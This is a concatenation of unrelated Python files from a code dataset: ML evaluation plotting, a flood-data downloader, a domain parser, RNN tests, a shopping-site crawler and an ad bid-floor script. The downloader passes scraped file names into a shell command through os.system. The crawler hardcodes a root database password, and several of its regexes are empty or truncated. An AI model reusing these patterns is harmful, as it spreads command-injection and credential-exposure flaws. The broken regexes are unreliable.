self.ml.grid_search(self.estimators[self.run_estimator_name], self.data[data_name])\n gs_opt_params = r['gs_opt_params']\n validation_cv_result = r['gs_opt_cv_result']\n gs_results = r['gs_results'] \n alm_fun.show_msg(self.log,self.verbose, self.compare_features_name[i] + ' - best params: ' + str(gs_opt_params)) \n else:\n r = self.ml.run_cv_prediction(self.estimators[self.run_estimator_name], self.data[data_name]) \n validation_cv_result = r['validation_cv_result']\n \n validation_cv_result.index = [self.compare_features_name[i]]\n validation_cv_result.columns = ['cv_' + x for x in validation_cv_result.columns]\n \n r = self.ml.run_test_prediction(self.estimators[self.run_estimator_name], self.data[data_name]) \n test_bs_result = r['test_bs_result']\n test_predicitons = pd.Series(r['test_y_predicted'], name=self.compare_features_name[i])\n test_bs_result.index = [self.compare_features_name[i]]\n test_bs_result.columns = ['test_' + x for x in test_bs_result.columns] \n \n \n if fc_results is None: \n fc_results = pd.concat([validation_cv_result, test_bs_result], axis=1)\n else:\n fc_results = pd.concat([fc_results, pd.concat([validation_cv_result, test_bs_result], axis=1)]) \n if fc_predictions is None: \n fc_predictions = test_predicitons\n else:\n fc_predictions = pd.concat([fc_predictions, test_predicitons], axis=1) \n \n alm_fun.show_msg(self.log,self.verbose,self.compare_features_name[i])\n \n alm_fun.show_msg(self.log,self.verbose,str(fc_results))\n fc_results.to_csv(self.project_path + data_name +'_feature_comparison_results' + '_fold_' + str(self.data[data_name].cur_test_split_fold) + '_' + str(self.data[data_name].cur_gradient_key) +'.csv')\n \n if self.data[data_name].if_engineer:\n predition_labels = self.data[data_name].test_splits_engineered_df[self.data[data_name].cur_test_split_fold][self.data[data_name].cur_gradient][self.data[data_name].dependent_variable] \n else:\n predition_labels = self.data[data_name].test_data_index_df.loc[self.data[data_name].test_splits_df[self.data[data_name].cur_test_split_fold][self.data[data_name].cur_gradient_key],self.data[data_name].dependent_variable] \n \n fc_predictions = pd.concat([fc_predictions, predition_labels], axis=1) \n fc_predictions.to_csv(self.project_path + data_name +'_fc_predictions' + '_fold_' + str(self.data[data_name].cur_test_split_fold) + '_' + str(self.data[data_name].cur_gradient_key) +'.csv',index = False)\n if self.estimators[self.run_estimator_name].ml_type == 'classification_binary':\n auprc_plotname = self.project_path + 'output/' + mode + '_' + data_name + '_fold_' + str(self.data[data_name].cur_test_split_fold) + '_' + str(self.data[data_name].cur_gradient_key) + '_auprc.png'\n auroc_plotname = self.project_path + 'output/' + mode + '_' + data_name + '_fold_' + str(self.data[data_name].cur_test_split_fold) + '_' + str(self.data[data_name].cur_gradient_key) + '_auroc.png'\n alm_fun.plot_prc(predition_labels, fc_predictions[self.compare_features_name_forplot], auprc_plotname, 20, 10, None, 0.9, 0.9, 'AUPRC Comparison')\n alm_fun.plot_roc(predition_labels, fc_predictions[self.compare_features_name_forplot], auroc_plotname, 20, 10, None, 0.9, 0.9, 'AUROC Comparison')\n return_objs[mode][data_name] = fc_results\n \n etime2 = time.time()\n# alm_fun.show_msg(self.log,self.verbose,\"Class: [alm_project] Fun: [run] -- Current Mode: \" + \"[\" + mode + \"]\" + \" Current Data: \" + data_name + \", running time was %g seconds\" % (etime2 - stime2)) \n\n return (return_objs)\n \n def project_plot(self, data, mode, data_name, x_label, y_label, ylim_min=0, ylim_max=0.5, fig_w=20 , fig_h=5):\n title = mode + ' (' + data_name + ')' \n plot_name = self.project_path + 'output/' + mode + '_' + data_name + '.png' \n title_size = 30\n label_size = 20\n tick_size = 15 \n # alphame_ml.plot_barplot(data,fig_w,fig_h,title,title_size,x_label,y_label,label_size,tick_size,ylim_min,ylim_max,plot_name)\n\n def plots(self):\n if plot:\n if alm_dataset.ml_type == 'classification': \n fig = plt.figure(figsize=(20, 10))\n plt.clf()\n \n ax = plt.subplot(2, 2, 1)\n ax.pie([alm_dataset.prior, 1 - alm_dataset.prior], autopct='%1.1f%%', labels=['positive', 'negative'], colors=['red', 'green'])\n ax.set_title('Dataset:' + '[' + alm_dataset.name + ']' + ' size: [' + str(alm_dataset.n_train) + ']' , size=15)\n \n plt.subplot(2, 2, 2)\n ax = sns.barplot(cv_feature_importance.index, cv_feature_importance)\n ax.set_title('Feature importance', size=15)\n ax.set_ylabel('Importance')\n ax.tick_params(labelsize=10) \n \n plt.subplot(2, 2, 3)\n cv_auroc_result = validation_cv_result[[s + '_auroc' for s in alm_dataset.compare_features] + ['auroc']]\n cv_auroc_result = cv_auroc_result.sort_values()\n predictors = list(cv_auroc_result.index)\n \n for i in range(len(predictors)):\n if '_auroc' in predictors[i]:\n predictors[i] = predictors[i][:-6]\n predictors[predictors.index('auroc')] = predictor_name \n \n ax = sns.barplot(predictors, cv_auroc_result)\n ax.set_title('Predictor performance AUROC' + ' [' + str(alm_dataset.cv_split_folds) + ' folds]', size=15)\n ax.set_ylabel('AUROC')\n ax.tick_params(labelsize=10)\n ax.set_ylim(0, 1)\n i = 0\n for p in ax.patches:\n height = p.get_height()\n ax.text(p.get_x() + p.get_width() / 2., height + 0.005, np.array(cv_auroc_result)[i], ha=\"center\") \n i += 1\n \n plt.subplot(2, 2, 4)\n cv_auprc_result = validation_cv_result[[s + '_auprc' for s in alm_dataset.compare_features] + ['auprc']]\n cv_auprc_result = cv_auprc_result.sort_values()\n predictors = list(cv_auprc_result.index)\n \n for i in range(len(predictors)):\n if '_auprc' in predictors[i]:\n predictors[i] = predictors[i][:-6]\n predictors[predictors.index('auprc')] = predictor_name \n ax = sns.barplot(predictors, cv_auprc_result)\n ax.set_title('Predictor performance AURPC' + ' [' + str(alm_dataset.cv_split_folds) + ' folds]', size=15)\n ax.set_ylabel('AUPRC')\n ax.tick_params(labelsize=10)\n ax.set_ylim(0, 1)\n i = 0\n for p in ax.patches:\n height = p.get_height()\n ax.text(p.get_x() + p.get_width() / 2., height + 0.005, np.array(cv_auprc_result)[i], ha=\"center\") \n i += 1 \n \n fig.tight_layout()\n plt.savefig(self.path + 'cv_' + alm_dataset.name + 'png') \n \n if alm_dataset.ml_type == 'regression':\n fig = plt.figure(figsize=(16, 10))\n plt.clf()\n \n plt.subplot(3, 1, 3)\n ax = sns.barplot(cv_feature_importance.index[:10], cv_feature_importance[:10])\n ax.set_title('Feature importance', size=15)\n ax.set_ylabel('Importance')\n ax.tick_params(labelsize=10)\n \n plt.subplot(3, 1, 1)\n cv_pcc_result = validation_cv_result[[s + '_pcc' for s in alm_dataset.compare_features] + ['pcc']]\n cv_pcc_result = cv_pcc_result.sort_values()\n predictors = list(cv_pcc_result.index)\n \n for i in range(len(predictors)):\n if '_pcc' in predictors[i]:\n predictors[i] = predictors[i][:-4]\n predictors[predictors.index('pcc')] = predictor_name \n ax = sns.barplot(predictors, cv_pcc_result)\n ax.set_title('Predictor performance PCC' + ' [' + str(alm_dataset.cv_split_folds) + ' folds]', size=15)\n ax.set_ylabel('pcc')\n ax.tick_params(labelsize=10)\n # ax.set_ylim(0,1)\n i = 0\n for p in ax.patches:\n height = p.get_height()\n ax.text(p.get_x() + p.get_width() / 2., height + 0.005, np.array(cv_pcc_result)[i], ha=\"center\") \n i += 1 \n pass \n \n plt.subplot(3, 1, 2)\n cv_rmse_result = validation_cv_result[[s + '_rmse' for s in alm_dataset.compare_features] + ['rmse']]\n cv_rmse_result = cv_rmse_result.sort_values()\n predictors = list(cv_rmse_result.index)\n \n for i in range(len(predictors)):\n if '_rmse' in predictors[i]:\n predictors[i] = predictors[i][:-5]\n predictors[predictors.index('rmse')] = predictor_name \n ax = sns.barplot(predictors, cv_rmse_result)\n ax.set_title('Predictor performance rmse' + ' [' + str(alm_dataset.cv_split_folds) + ' folds]', size=15)\n ax.set_ylabel('rmse')\n ax.tick_params(labelsize=10)\n i = 0\n for p in ax.patches:\n height = p.get_height()\n ax.text(p.get_x() + p.get_width() / 2., height + 0.005, np.array(cv_rmse_result)[i], ha=\"center\") \n i += 1 \n pass \n fig.tight_layout()\n plt.savefig(self.path + 'cv_' + alm_dataset.name + '.png') \n \n def remove_features(self, features, i):\n remove_features = features[i]\n if any(isinstance(i, list) for i in features): # if features are nested list\n features = list(itertools.chain(*features)) \n features = list(set(features)) \n if isinstance(remove_features, list): \n for x in remove_features:\n features.remove(x)\n else:\n features.remove(remove_features)\n features = list(set(features)) \n return (features)\n \n","sub_path":"ml/python/alm_project.py","file_name":"alm_project.py","file_ext":"py","file_size_in_byte":56656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"157447007","text":"\"\"\"\n mom_output_all.py\n -- modified from mom_output.py\n -- extract output for all watersheds for a given date\n parameters:\n -- pfafidlist: a csv file has pfaf_id column\n -- date: YYYYMMDDHH\n output:\n -- wastersheds_YYYYMMDDHH.geojson: wastersheds in the list\n example:\n python mom_output_all.py pakistan2022/research_watersheds.csv 20220901 pakistan2022\n\"\"\"\n\nimport argparse\nimport os\n\nimport geopandas as gpd\nimport pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\n\nMOM_DOWNLOAD_FOLDER = \"pdc_final\"\nMOM_GEOJSON_FOLDER = \"geojson\"\n\n\ndef download_mom(starttime, endtime):\n \"\"\"download mom output in a time period\"\"\"\n baseurl = \"https://mom.tg-ear190027.projects.jetstream-cloud.org/ModelofModels/Final_Alert/\"\n reqs = requests.get(baseurl)\n soup = BeautifulSoup(reqs.text, \"html.parser\")\n\n start_mom = \"Final_Attributes_{}HWRF+MOM+DFO+VIIRSUpdated_PDC.csv\".format(starttime)\n end_mom = \"Final_Attributes_{}HWRF+MOM+DFO+VIIRSUpdated_PDC.csv\".format(endtime)\n\n mom_list = []\n for link in soup.find_all(\"a\"):\n fstr = link.string\n if not \"csv\" in fstr:\n continue\n if fstr >= start_mom and fstr <= end_mom:\n mom_list.append(fstr)\n if not os.path.exists(os.path.join(MOM_DOWNLOAD_FOLDER, fstr)):\n dataurl = os.path.join(baseurl, fstr)\n wgetcmd = \"wget -nc \" + dataurl + \" -P \" + MOM_DOWNLOAD_FOLDER\n os.system(wgetcmd)\n mom_list.sort()\n return mom_list\n\n\ndef merge_mom(df_ids, momfiles):\n \"\"\"merge mom output to one csv\"\"\"\n filed_list = [\"Severity\", \"Flag\", \"Alert\"]\n for mom_field in filed_list:\n joined_df = df_ids.copy()\n joined_df.set_index(\"pfaf_id\", inplace=True)\n\n total_file = len(momfiles)\n for count, mom in enumerate(momfiles):\n print(\"processing {} / {}\".format(count, total_file))\n mom_df = pd.read_csv(\n os.path.join(MOM_DOWNLOAD_FOLDER, mom), encoding=\"ISO-8859-1\"\n )\n mom_df = mom_df[[\"pfaf_id\", mom_field]]\n mom_df = mom_df.drop_duplicates(subset=[\"pfaf_id\"])\n # Final_Attributes_2022081606HWRF+MOM+DFO+VIIRSUpdated_PDC.csv\n datestr = mom[17 : 17 + 10]\n # rename alert\n mom_df.rename(columns={mom_field: datestr}, inplace=True)\n mom_df.set_index(\"pfaf_id\", inplace=True)\n # merge stuff\n joined_df = joined_df.join(mom_df, how=\"left\")\n mom_df = None\n\n joined_df.to_csv(f\"momoutput_{mom_field}.csv\", index=True, float_format=\"%.3f\")\n joined_df = None\n\n\ndef output_geojson(df_ids, momfiles):\n \"\"\"output geojsons for selected watersheds\"\"\"\n\n watersheds_gdb = os.path.expanduser(\n \"~/Projects/ModelOfModels/VIIRS_Processing/Watershed_pfaf_id.shp\"\n )\n watersheds = gpd.read_file(watersheds_gdb)\n watersheds.set_index(\"pfaf_id\", inplace=True)\n\n # only use sub of watersheds\n idfield = \"pfaf_id\"\n out_df = watersheds.loc[df_ids[idfield]]\n\n total_file = len(momfiles)\n for count, mom in enumerate(momfiles):\n print(\"generating geojson {} / {}\".format(count, total_file))\n mom_df = pd.read_csv(\n os.path.join(MOM_DOWNLOAD_FOLDER, mom), encoding=\"ISO-8859-1\"\n )\n mom_df = mom_df.drop_duplicates(subset=[idfield])\n # drop columns\n mom_df.drop(columns=[\"area_km2\", \"rfr_score\", \"cfr_score\"], inplace=True)\n mom_df.set_index(\"pfaf_id\", inplace=True)\n\n datestr = mom[17 : 17 + 10]\n\n # get subset\n joined_df = out_df.join(mom_df, how=\"left\")\n outputfile = os.path.join(MOM_GEOJSON_FOLDER, f\"watersheds_all_{datestr}.geojson\")\n if not os.path.exists(outputfile):\n joined_df.to_file(outputfile, driver=\"GeoJSON\")\n # alist = [\"Warning\", \"Watch\"]\n # for acond in alist:\n # n_df = joined_df[joined_df.Alert == acond]\n # if not n_df.empty:\n # outputfile = os.path.join(\n # MOM_GEOJSON_FOLDER, f\"{datestr}_{acond}.geojson\"\n # )\n # if not os.path.exists(outputfile):\n # n_df.to_file(outputfile, driver=\"GeoJSON\")\n return\n \n\ndef extract_mom(csvfile, timeperiod, outputfolder):\n \"\"\"extract mom outputs\"\"\"\n\n # load list of watersheds\n df = pd.read_csv(csvfile)\n df = df[[\"pfaf_id\"]]\n\n # check the folder\n mom_folder = os.path.join(outputfolder, MOM_DOWNLOAD_FOLDER)\n if not os.path.exists(mom_folder):\n os.makedirs(mom_folder)\n\n mom_folder = os.path.join(outputfolder, MOM_GEOJSON_FOLDER)\n if not os.path.exists(mom_folder):\n os.makedirs(mom_folder)\n os.chdir(outputfolder)\n\n if len(timeperiod) == 8:\n start_t = timeperiod + \"00\"\n else:\n start_t = timeperiod \n end_t = start_t\n\n # start_t += \"00\"\n # end_t += \"18\"\n mom_list = download_mom(start_t, end_t)\n print(mom_list)\n # extract mom output to one file\n #merge_mom(df, mom_list)\n\n # generate geojson output\n output_geojson(df, mom_list)\n\n\ndef main():\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\"idlist\", type=str, help=\"csv file contains pfaf_id\")\n parser.add_argument(\"timeperiod\", type=str, help=\"time period: YYYYMMDDHH\")\n parser.add_argument(\"outputfolder\", type=str, help=\"output folder\")\n args = parser.parse_args()\n extract_mom(args.idlist, args.timeperiod, args.outputfolder)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tools/mom_output_all.py","file_name":"mom_output_all.py","file_ext":"py","file_size_in_byte":5583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"462006689","text":"import re\nfrom urllib.parse import urlparse\n\n\nclass DomainException(Exception):\n \"\"\"Raised when an invalid is created.\"\"\"\n\n\nclass Domain:\n def __init__(self, name: str):\n valid_domain_name = re.match(r\".*\\.[a-z]{2,3}$\", name)\n if valid_domain_name:\n self.name = name\n else:\n raise DomainException\n\n def __str__(self):\n return self.name\n\n @classmethod\n def parse_url(cls, url: str):\n domain_portion = urlparse(url).netloc\n return cls(name=domain_portion)\n\n @classmethod\n def parse_email(cls, email: str):\n _, _, domain_portion = email.rpartition(\"@\")\n return cls(name=domain_portion)\n","sub_path":"313/constructors.py","file_name":"constructors.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"454296025","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom random import choice\n\nimport numpy as np\nimport pytest\nfrom hypothesis import given\nfrom hypothesis import settings\nfrom hypothesis import strategies as st\n\nfrom NumPyNet.layers import RNN_layer\n\n__author__ = ['Mattia Ceccarelli', 'Nico Curti']\n__email__ = ['mattia.ceccarelli3@studio.unibo.it', 'nico.curti2@unibo.it']\n\n\nclass TestRNNLayer:\n '''\n Tests:\n - costructor of RNN_layer object\n - print function\n\n to be:\n forward function against tf.keras\n update function\n backward function against tf.keras\n '''\n\n @given(outputs=st.integers(min_value=-3, max_value=10),\n steps=st.integers(min_value=1, max_value=4),\n b=st.integers(min_value=5, max_value=15),\n w=st.integers(min_value=15, max_value=100),\n h=st.integers(min_value=15, max_value=100),\n c=st.integers(min_value=1, max_value=10))\n @settings(max_examples=10,\n deadline=None)\n def test_constructor(self, outputs, steps, b, w, h, c):\n\n numpynet_activ = ['relu', 'logistic', 'tanh', 'linear']\n\n if outputs > 0:\n weights_choice = [np.random.uniform(low=-1, high=1., size=(w * h * c, outputs)), None]\n bias_choice = [np.random.uniform(low=-1, high=1., size=(outputs,)), None]\n\n else:\n with pytest.raises(ValueError):\n RNN_layer(outputs=outputs, steps=steps)\n\n outputs += 10\n weights_choice = [[np.random.uniform(low=-1, high=1., size=(w * h * c, outputs))] * 3, None]\n bias_choice = [[np.random.uniform(low=-1, high=1., size=(outputs,))] * 3, None]\n\n weights = choice(weights_choice)\n bias = choice(bias_choice)\n\n for numpynet_act in numpynet_activ:\n layer = RNN_layer(outputs=outputs, steps=steps, activation=numpynet_act,\n input_shape=(b, w, h, c),\n weights=weights, bias=bias)\n\n if weights is not None:\n np.testing.assert_allclose(layer.input_layer.weights, weights[0], rtol=1e-5, atol=1e-8)\n np.testing.assert_allclose(layer.self_layer.weights, weights[1], rtol=1e-5, atol=1e-8)\n np.testing.assert_allclose(layer.output_layer.weights, weights[2], rtol=1e-5, atol=1e-8)\n\n if bias is not None:\n np.testing.assert_allclose(layer.input_layer.bias, bias[0], rtol=1e-5, atol=1e-8)\n np.testing.assert_allclose(layer.self_layer.bias, bias[1], rtol=1e-5, atol=1e-8)\n np.testing.assert_allclose(layer.output_layer.bias, bias[2], rtol=1e-5, atol=1e-8)\n\n assert layer.output is None\n\n @given(outputs=st.integers(min_value=3, max_value=10),\n steps=st.integers(min_value=1, max_value=4),\n b=st.integers(min_value=5, max_value=15),\n w=st.integers(min_value=15, max_value=100),\n h=st.integers(min_value=15, max_value=100),\n c=st.integers(min_value=1, max_value=10))\n @settings(max_examples=10,\n deadline=None)\n def test_printer(self, outputs, steps, b, w, h, c):\n\n layer = RNN_layer(outputs=outputs, steps=steps, activation='linear')\n\n with pytest.raises(TypeError):\n print(layer)\n\n layer = RNN_layer(outputs=outputs, steps=steps, activation='linear', input_shape=(b, w, h, c))\n\n print(layer)\n","sub_path":"testing/test_rnn_layer.py","file_name":"test_rnn_layer.py","file_ext":"py","file_size_in_byte":3496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"415731563","text":"import urllib.request\nimport re\nimport pymysql\nimport os\nimport random\nfrom urllib.request import urlopen, Request\n\ndb = pymysql.connect(\"localhost\", \"root\", \"87654321\", \"AnShop\")\ncursor = db.cursor()\n\ndef downloadIMG(url, path):\n opener=urllib.request.build_opener()\n opener.addheaders=[('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1941.0 Safari/537.36')]\n urllib.request.install_opener(opener)\n urllib.request.urlretrieve(url, path)\n print(\"\\tSave to \", path)\n\ndef getHTMLFromUrl(url):\n fp = urllib.request.urlopen(url)\n mybytes = fp.read()\n html = mybytes.decode(\"utf8\")\n fp.close()\n return html\n\ndef findRegexInHTML(regex, html):\n matchs = re.findall(regex, html)\n return matchs\n\ndef getLinkProduct(html):\n result = []\n regexLink = r''\n regexImage = r'\\n\t\\t\\t\\t\\t\\t\\t

(.*)<\\/h4>', html)\n productDetail = findRegexInHTML(r'
\\n\\t\\t\\t\\t\\t\\t\\t\\t\\n(.*)<\\/span>', html)\n productPrice = findRegexInHTML(r'
\\n(.*)<\\/span>', html)\n query = \"INSERT INTO `AnShop`.`Products` (`ProductName`, `GroupSizeID`,`CategoryID`, `Price`, `UnitsInStock`, `Detail`, `Deleted`) VALUES (%s, 4, 3, %s, 50, %s, 0)\"\n value = [productNameVN, productPrice, productDetail]\n try:\n cursor.execute(query, value)\n db.commit()\n print(\"Inserted \"+productNameVN)\n except:\n print(\"Error in insert\", productNameVN)\n\n queryGetID = \"SELECT ProductID FROM AnShop.Products where ProductName = %s\"\n cursor.execute(queryGetID, productNameVN)\n result = cursor.fetchone()\n productID = int(result[0])\n\n tmp = url.split(\"/\");\n productName = tmp[len(tmp)-1].split(\"?\")[0]\n color = url.split(\"=\")[1]\n colorID = int()\n\n linkImages = re.findall(r'', html)\nfor match in matchs:\n url = 'https://coupletx.com' + match[0]\n print('\\n', match)\n # getProduct(url)\n\n","sub_path":"public/image/crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"242157739","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 23 15:12:34 2016\n\n@author: Administrator\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n##데이터 정형화 및 파싱\ndata = np.genfromtxt('C:\\\\Users\\\\Administrator\\\\Desktop\\\\data\\\\sample_group.txt',dtype='str')#일자별 성과 csv 파일\n\n\nfor i in range(int((data.shape[0]/7))) :\n if i == 0:\n ad_sets = np.array([data[i*7:(i+1)*7]])\n else :\n ad_sets = np.append(ad_sets, [data[i*7:(i+1)*7]],axis = 0)\n\nfor i in range(ad_sets.shape[0]):\n if i == 0 :\n cvr = np.array([[float(j.strip('%')) for j in (np.transpose(ad_sets[i])[8])]])\n ctr = np.array([[float(l.strip('%')) for l in (np.transpose(ad_sets[i])[7])]])\n cnt = np.array([[float(n)/100 for n in (np.transpose(ad_sets[i])[6])]])\n revenue = np.array([int(s.replace(',','')) for s in (np.transpose(ad_sets[i])[2])])\n cost = np.array([int(k.replace(',','')) for k in (np.transpose(ad_sets[i])[3])])\n marg = np.array([(1 - cost/(revenue+100))*100])\n ssp = np.array([[m for m in np.transpose(ad_sets[i])[9]]])\n\n else :\n cvr = np.append(cvr, [[float(j.strip('%')) for j in (np.transpose(ad_sets[i])[8])]], axis =0)\n ctr = np.append(ctr,[[float(l.strip('%')) for l in (np.transpose(ad_sets[i])[7])]], axis =0)\n cnt = np.append(cnt,[[float(n)/100 for n in (np.transpose(ad_sets[i])[6])]], axis = 0) \n revenue = np.array([int(s.replace(',','')) for s in (np.transpose(ad_sets[i])[2])])\n cost = np.array([int(k.replace(',','')) for k in (np.transpose(ad_sets[i])[3])]) \n marg = np.append(marg,[(1 - cost/(revenue+100))*100], axis =0)\n ssp = np.append(ssp, [[m for m in np.transpose(ad_sets[i])[9]]], axis =0)\n\n\n###data sort and dvide complete\n\n\n\n\n\n\na_cvr = 0.08\nb_cvr = 200\nc_cvr = 1\n\na_ctr = 5\nb_ctr = 0\n\na_marg = 1\nb_marg = 0\n\n##for 구문 돌리기\ncvr_r = b_cvr*1/(1+(np.exp(-a_cvr*cvr*cnt+c_cvr)))\nctr_r = (a_ctr*ctr + b_ctr)\nmarg_r = (a_marg*marg + b_marg + ctr_r)\n\nc = (cvr_r + marg_r + ctr_r)\n\n\n#for i in c :\n# plt.plot(i,'o')\n#for i in range(24) :\ni = 2\n\nplt.plot(cvr[i]*cnt[i])\nplt.plot(10*ctr[i])\nplt.plot(marg[i])\nplt.plot(c[i]/2)\n\n\n\nc_t =np.array([])\nc_t_r = 0 \n\nfor i in c :\n for j in range(i.size) :\n if j == 0:\n c_t_r = i[j]\n else :\n r = np.absolute(c_t_r - i[j])/c_t_r\n k = 1/r\n c_t_r = (1/2)*( (j/(j+1))*c_t_r + (1/(j+1))*i[j] + (1/2)*((1/k+1)*c_t_r + (k/k+1)*i[j]))\n c_t = np.append(c_t,c_t_r) \n\n\n#학습 알고리즘\n\"\"\"\ninput1 =0\n\nfor i in c :\n for j in range(i.size) :\n if (j ==0) :\n input2 = i[j]#ain.read() 대신에 sensorValue 값을 대신 넣는다.\n output1 = input2\n\n else :\n input2 = j[i] #ain.read() 대신에 sensorValue 값을 대신 넣는다.\n output2 = 0.9394*output1+0.0303*input2+0.0303*input1\n output1= output2\n input1 = input2\n\n c_t = np.append(c_t,output2) \n\n\"\"\"\nsigma = c_t/c_t.sum()\n\n#sigma_p = np.exp( 50*(sigma-0.1))\n\n\"\"\"\nindex = argmin(N -sigma*mulang)\nw(index)\n\n\"\"\"\n\n##import bid_floor data\nbanner = np.loadtxt('C:\\\\Users\\\\Administrator\\\\Desktop\\\\data\\\\banner.txt')#최근? 아님 일년간? 결제된 bid floor 현황_banner\ninner = np.loadtxt('C:\\\\Users\\\\Administrator\\\\Desktop\\\\data\\\\inner.txt')\nlock = np.loadtxt('C:\\\\Users\\\\Administrator\\\\Desktop\\\\data\\\\lock.txt')\nnative = np.loadtxt('C:\\\\Users\\\\Administrator\\\\Desktop\\\\data\\\\native.txt')\n\nbanner = np.transpose(banner)\ninner = np.transpose(inner)\nlock = np.transpose(lock)\nnative = np.transpose(native)\n\n\n\nbanner_N = banner[1][1:].cumsum()\nbanner_bid_f = banner[0][1:]\nbanner_o = banner[1][1:]\n\ninner_N = inner[1][1:].cumsum()\ninner_bid_f = inner[0][1:]\ninner_o = inner[1][1:]\n\nlock_N = lock[1][1:].cumsum()\nlock_bid_f = lock[0][1:]\nlock_o = lock[1][1:]\n\nnative_N = native[1][1:].cumsum()\nnative_bid_f = native[0][1:]\nnative_o = native[1][1:]\n\n\nsigma_N = np.array([])\nsol_bid_floors = np.array([])\n\ntotal_sum = banner_N[-1] + inner_N[-1]+lock_N[-1]+native_N[-1]\ntotal_buget = (banner_o*banner_bid_f).sum() + (inner_o*inner_bid_f).sum() + (lock_o*lock_bid_f).sum() + (native_o*native_bid_f).sum()\nsol_indexes = np.array([])\nsol_budgets = np.array([])\nsigma_percents = np.array([])\n\nfor i in range(ssp.shape[0]) :\n ssp_id = np.fromstring(ssp[i][0], dtype=int, sep=',')\n for j in ssp_id :\n if j == 1 :\n sigma_bid = total_sum*sigma[i]\n sigma_bid = banner_N[-1]*1/(1+2*np.exp(-3*sigma_bid/(2*banner_N[-1])))\n sigma_percent = 1/(1+2*np.exp(-3*sigma_bid/(2*banner_N[-1])))\n\n\n sol_index = np.argmin(np.absolute(0.7*(banner_N-sigma_bid)) + 0.3*(banner_bid_f)/(banner_o))#위치별 데이터 비딩가격이 미치는 영향 게산\n sol_bid_floor = banner_bid_f[sol_index]\n print(sol_index)\n\n sol_budget = (banner_o[0:sol_index]*banner_bid_f[0:sol_index]).sum()\n\n\n sigma_N = np.append(sigma_N, sigma_bid)\n sol_bid_floors = np.append(sol_bid_floors, sol_bid_floor)\n sol_budgets = np.append(sol_budgets, sol_budget)\n sol_indexes = np.append(sol_indexes, sol_index)\n sigma_percents = np.append(sigma_percents, sigma_percent)\n\n elif j == 6 :\n\n sigma_bid = total_sum*sigma[i]\n sigma_bid = inner_N[-1]*1/(1+2*np.exp(-3*sigma_bid/(2*inner_N[-1])))\n sigma_percent = 1/(1+2*np.exp(-3*sigma_bid/(2*inner_N[-1])))\n\n\n sol_index = np.argmin(np.absolute(0.7*(inner_N-sigma_bid))+0.3*(inner_bid_f)/(inner_o))\n sol_bid_floor = inner_bid_f[sol_index]\n print(sol_index)\n\n sol_budget = (inner_o[0:sol_index]*inner_bid_f[0:sol_index]).sum()\n\n sigma_N = np.append(sigma_N, sigma_bid)\n sol_bid_floors = np.append(sol_bid_floors, sol_bid_floor)\n sol_budgets = np.append(sol_budgets, sol_budget)\n sol_indexes = np.append(sol_indexes, sol_index)\n sigma_percents = np.append(sigma_percents, sigma_percent)\n\n elif j == 11 :\n\n sigma_bid = total_sum*sigma[i]\n sigma_bid = lock_N[-1]*1/(1+2*np.exp(-3*sigma_bid/(2*lock_N[-1])))\n sigma_percent = 1/(1+2*np.exp(-3*sigma_bid/(2*lock_N[-1])))\n\n sol_index = np.argmin(np.absolute(0.7*(lock_N-sigma_bid)) + 0.3*(lock_bid_f)/(lock_o))\n sol_bid_floor = lock_bid_f[sol_index]\n print(sol_index)\n\n sol_budget = (lock_o[0:sol_index]*lock_bid_f[0:sol_index]).sum() \n\n sigma_N = np.append(sigma_N, sigma_bid)\n sol_bid_floors = np.append(sol_bid_floors, sol_bid_floor)\n sol_budgets = np.append(sol_budgets, sol_budget)\n sol_indexes = np.append(sol_indexes, sol_index)\n sigma_percents = np.append(sigma_percents, sigma_percent)\n\n elif j == 14 :\n\n sigma_bid = total_sum*sigma[i]\n sigma_bid = native_N[-1]*1/(1+2*np.exp(-3*sigma_bid/(2*native_N[-1]))) \n sigma_percent = 1/(1+2*np.exp(-3*sigma_bid/(2*lock_N[-1])))\n\n sol_index = np.argmin(np.absolute(0.7*(sigma_bid-native_N)) + 0.3*(native_bid_f)/(native_o))\n sol_bid_floor = native_bid_f[sol_index]\n print(sol_index)\n\n sol_budget = (native_o[0:sol_index]*native_bid_f[0:sol_index]).sum()\n\n sigma_N = np.append(sigma_N, sigma_bid)\n sol_bid_floors = np.append(sol_bid_floors, sol_bid_floor)\n sol_budgets = np.append(sol_budgets, sol_budget)\n sol_indexes = np.append(sol_indexes, sol_index)\n sigma_percents = np.append(sigma_percents, sigma_percent)\n\n\n\"\"\"\n\n\nfor i in range(ssp.shape[0]) :\n ssp_id = np.fromstring(ssp[i][0], dtype=int, sep=',')\n for j in ssp_id :\n if j == 1 :\n sigma_bid = total_sum*sigma[i]\n sol_index = np.argmin(np.absolute(total_buget*(banner_N-sigma_bid)*(banner_o*banner_bid_f)))\n sol_bid_floor = banner_bid_f[sol_index]\n print(sol_index)\n\n sigma_N = np.append(sigma_N, sigma_bid)\n sol_bid_floors = np.append(sol_bid_floors, sol_bid_floor)\n\n elif j == 6 :\n\n sigma_bid = total_sum*sigma[i]\n sol_index = np.argmin(np.absolute(total_buget*(inner_N-sigma_bid)/(inner_o*inner_bid_f)))\n sol_bid_floor = inner_bid_f[sol_index]\n print(sol_index)\n\n sigma_N = np.append(sigma_N, sigma_bid)\n sol_bid_floors = np.append(sol_bid_floors, sol_bid_floor)\n\n elif j == 11 :\n\n sigma_bid = total_sum*sigma[i]\n sol_index = np.argmin(np.absolute(total_buget*(lock_N-sigma_bid)/(lock_o*lock_bid_f)))\n sol_bid_floor = lock_bid_f[sol_index]\n print(sol_index) \n\n sigma_N 